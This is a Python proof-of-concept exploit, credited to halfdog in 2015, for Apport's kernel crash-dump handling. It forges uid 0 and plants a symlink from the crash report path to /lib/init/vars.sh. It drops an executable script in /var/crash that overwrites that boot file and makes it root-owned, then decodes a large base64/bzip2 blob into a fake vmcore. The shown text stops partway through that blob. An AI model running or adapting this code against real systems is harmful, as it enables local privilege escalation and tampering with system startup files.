#!/usr/bin/python3
#
# This software is provided by the copyright owner "as is" and any
# expressed or implied warranties, including, but not limited to,
# the implied warranties of merchantability and fitness for a particular
# purpose are disclaimed. In no event shall the copyright owner be
# liable for any direct, indirect, incidential, special, exemplary or
# consequential damages, including, but not limited to, procurement
# of substitute goods or services, loss of use, data or profits or
# business interruption, however caused and on any theory of liability,
# whether in contract, strict liability, or tort, including negligence
# or otherwise, arising in any way out of the use of this software,
# even if advised of the possibility of such damage.
#
# Copyright (c) 2015 halfdog <me (%) halfdog.net>
#
# See http://www.halfdog.net/Security/2015/ApportKernelCrashdumpFileAccessVulnerabilities/ for more information.


import apport
import apport.fileutils
import os
import subprocess

# Make python believe we are uid=0, so that it creates the correct
# report file name.
def getuid():
  return 0
os.getuid=getuid

vmcorePath='/var/crash/vmcore'
logFile=open(vmcorePath+'.log', 'wb')
logFile.close()

pr = apport.Report('KernelCrash')
package = apport.packaging.get_kernel_package()
try:
    package_version = apport.packaging.get_version(package)
except ValueError as e:
    if 'does not exist' in e.message:
        package_version = 'unknown'
pr['Package'] = '%s %s' % (package, package_version)

pr.add_os_info()
pr['VmCoreLog'] = (vmcorePath+'.log',)
pr['VmCore'] = (vmcorePath,)

reportFileName=apport.fileutils.make_report_path(pr)
os.symlink('/lib/init/vars.sh', reportFileName)

execFileName='/var/crash/AuttsIhCkBCKVlJSVRkcgRsEooBsAAHSEdI0AABAA'
execFile=open(execFileName, 'wb')
execFile.write('''#!/bin/sh
cp -a /var/crash/vars.sh /lib/init/vars.sh
chown root.root /lib/init/vars.sh
touch /done
'''.encode('utf-8'))
execFile.close()
os.chmod(execFileName, 493)

subprocess.call(['/bin/sh', '-c', '''cd /var/crash; cp -a /lib/init/vars.sh .; base64 -d <<BASE64-EOF | bzip2 -cd > vmcore
QlpoOTFBWSZTWQlVMf0AB+t/////////////////////////////////////////////4CCfej3u873g
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
